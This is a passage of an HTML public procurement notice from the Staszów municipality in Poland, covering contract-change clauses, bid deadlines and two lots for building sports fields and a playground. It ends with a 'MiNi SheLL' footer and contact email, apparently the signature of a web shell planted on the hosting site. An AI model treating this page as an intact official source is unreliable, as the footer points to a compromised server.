Zmiany, o których mowa w lit b) nie mogą stanowić podstawy zwiększenia wartości umowy, z
zastrzeżeniem postanowień zdania następnego. Wartość umowy może ulec podwyższeniu o kwotę
stanowiącą równowartość kosztów poniesionych w związku z wprowadzeniem zmian, o których
mowa w tirecie drugim lub trzecim, jeżeli w okresie gwarancji, oszczędności w kosztach
eksploatacji przedmiotu umowy, uzyskane na skutek wprowadzenia tych zmian, przewyższą
kwotę tej podwyżki. Zwiększona wartość umowy w tej części (podwyżka) będzie wypłacona
dopiero po okresie gwarancji.
Zmiany wskazywane w tirecie czwartym i piątym będą wprowadzane wyłącznie w zakresie
umożliwiającym oddanie przedmiotu umowy do użytkowania, a Zamawiający może ponieść
ryzyko zwiększenia wynagrodzenia z tytułu takich zmian wyłącznie w kwocie równej
zwiększonym z tego powodu kosztom. Każda ze wskazywanych w tym punkcie zmian może być
powiązana z obniżeniem wartości umowy.
ii.Zmiany osobowe:
- zmiana osób, będących personelem Wykonawcy wskazanym w ofercie, przy pomocy których
Wykonawca realizuje przedmiot umowy, na inne legitymujące się co najmniej równoważnymi
uprawnieniami, na zasadach określonych w niniejszej umowie;
- zmiana albo rezygnacja z podwykonawcy, na którego zasoby wykonawca powoływał się, na
zasadach określonych w art. 26 ust.2b PZP, w celu wykazania spełniania warunków udziału w
postępowaniu, o których mowa w art. 22 ust. 1 PZP, wykonawca jest obowiązany wykazać
zamawiającemu, iż proponowany inny podwykonawca lub wykonawca samodzielnie spełnia je w
stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia.
iii. Pozostałe zmiany:
- siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie z umową;
- zmiana sposobu rozliczania umowy lub dokonywania płatności na rzecz Wykonawcy na skutek
zmian zawartej przez zamawiającego umowy o dofinansowanie projektu lub wytycznych
dotyczących realizacji projektu;
- rezygnacja przez zamawiającego z realizacji części przedmiotu umowy. W takim przypadku
wartość umowy przysługująca wykonawcy zostanie pomniejszona, przy czym zamawiający
zapłaci za wszystkie spełnione świadczenia oraz udokumentowane koszty, które wykonawca
poniósł w związku z wynikającymi z umowy planowanymi świadczeniami,
- zmiany uzasadnione okolicznościami, o których mowa w art. 3571 Kc z uwzględnieniem faktu, że
za rażącą zostanie uznana strata w wysokości, o której mowa w art. 397 ksh.
2. Wszystkie powyższe postanowienia stanowią katalog zmian, na które zamawiający może wyrazić zgodę.
Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.staszow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy w Staszowie, 28-200 Staszów, ul. Opatowska 31, pokój 308.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.02.2015 godzina 11:00, miejsce: Urząd Miasta i Gminy w Staszowie, 28-200 Staszów, ul. Opatowska 31, sekretariat-pok.104.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie objęte pomocą w ramach działania 413 Wdrażanie lokalnych strategii rozwoju dla operacji,
które odpowiadają warunkom przyznania pomocy w ramach działania Odnowa i Rozwój wsi objętego
PROW na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1 pn: Budowa boisk i zagospodarowanie terenu wokół boisk w
Oględowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia objętym zadaniem Nr 1, jest budowa ogólnodostępnych boisk sportowych na
działce ozn. w ewid. gruntów nr 390 położonej w miejscowości Oględów w zakresie:
-budowy boiska sportowego wraz z wyposażeniem do piłki nożnej o wymiarach 29,0 m x 44,0 m o
nawierzchni trawiastej;
-budowy boiska sportowego wraz z wyposażeniem do piłki siatkowej o wymiarach 9,50 m x 18,0m o
nawierzchni trawiastej;
-wykonania piłkochwytów dł. 82,0 m, w tym: 58,0m wys. 6,0m (za bramkami), 24,0m wys. 4,0m (boczne);
-zagospodarowania terenu obejmującego m. in. elementy małej architektury tj. ławki, kosze na śmieci;
zgodnie z dokumentami (w załączeniu do opisu przedmiotu zamówienia) oraz inne konieczne prace
gwarantujące prawidłowe wykonanie przedmiotu zamówienia.
Ponadto odrębnie dla każdego zadania należy:
-zapewnić obsługę geodezyjną, w tym wykonać inwentaryzację powykonawczą,
-umieścić tablicę informacyjną o źródłach finansowania zadania ze środków Unii Europejskiej.
Zamówienie objęte pomocą w ramach działania 413 Wdrażanie lokalnych strategii rozwoju dla operacji,
które odpowiadają warunkom przyznania pomocy w ramach działania Odnowa i Rozwój wsi objętego PROW
na lata 2007-2013.
Opis przedmiotu zamówienia wraz z dokumentami, stanowi załącznik Nr 9 SIWZ.
Wykonawca udzieli gwarancji i rękojmi na roboty objęte przedmiotowym zamówieniem na okres minimum
36 miesięcy od daty ich odbioru końcowego.
Przedmiotowe zamówienie musi być wykonane zgodnie z obowiązującymi przepisami oraz warunkami
zawartymi w SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.21.22.00-8, 45.11.12.00-0, 45.11.27.23-9, 45.34.20.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 16.03.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Gwarancja i rękojmia na przedmiot umowy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2 pn: Budowa ogólnodostępnego boiska sportowego i zaplecza
rekreacyjnego w Jasieniu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia objętym zadaniem Nr 2, jest budowa ogólnodostępnego boiska oraz placu zabaw
na działce ozn. w ewid. gruntów nr: 379, położonej w miejscowości Jasień w zakresie:
-budowy boiska sportowego wraz z wyposażeniem do piłki nożnej o wymiarach 23,0 m x 43,0 m o
nawierzchni trawiastej;
-wykonania placu zabaw dla dzieci z nawierzchnią trawiastą, obejmującego urządzenia:
-zestaw zabawowy dwuwieżowy ze zjeżdżalnią - 1 szt,
-huśtawka wagowa podwójna (ważka) - 1 szt,
-huśtawka wahadłowa - 1szt,
-bujak na sprężynach (kiwak) -2 szt,
-urządzenie linarne - 1 szt,
-tablica informacyjna z regulaminem placu zabaw - 1 szt,
-kosz na śmieci - 2 szt ,
-ławki z oparciem - 4 szt,
-ogrodzenie z paneli zgrzewanych (dł. ogrodzenia ok. 60 mb w tym 1 furtka),
-zagospodarowania terenu obejmującego m. in. tereny zielone, ławki bez oparcia- 6 szt., kosze na śmieci - 2
szt., stojaki rowerowe;
zgodnie z dokumentami (w załączeniu do opisu przedmiotu zamówienia) oraz inne konieczne prace
gwarantujące prawidłowe wykonanie przedmiotu zamówienia.
Ponadto odrębnie dla każdego zadania należy:
-zapewnić obsługę geodezyjną, w tym wykonać inwentaryzację powykonawczą,
-umieścić tablicę informacyjną o źródłach finansowania zadania ze środków Unii Europejskiej.
Zamówienie objęte pomocą w ramach działania 413 Wdrażanie lokalnych strategii rozwoju dla operacji,
które odpowiadają warunkom przyznania pomocy w ramach działania Odnowa i Rozwój wsi objętego PROW
na lata 2007-2013.
Opis przedmiotu zamówienia wraz z dokumentami, stanowi załącznik Nr 9 SIWZ.
Wykonawca udzieli gwarancji i rękojmi na roboty objęte przedmiotowym zamówieniem na okres minimum
36 miesięcy od daty ich odbioru końcowego.
Przedmiotowe zamówienie musi być wykonane zgodnie z obowiązującymi przepisami oraz warunkami
zawartymi w SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.21.22.00-8, 45.11.12.00-0, 45.11.27.23-9, 45.34.20.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 16.03.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Gwarancja i rękojmia na przedmiot umowy - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com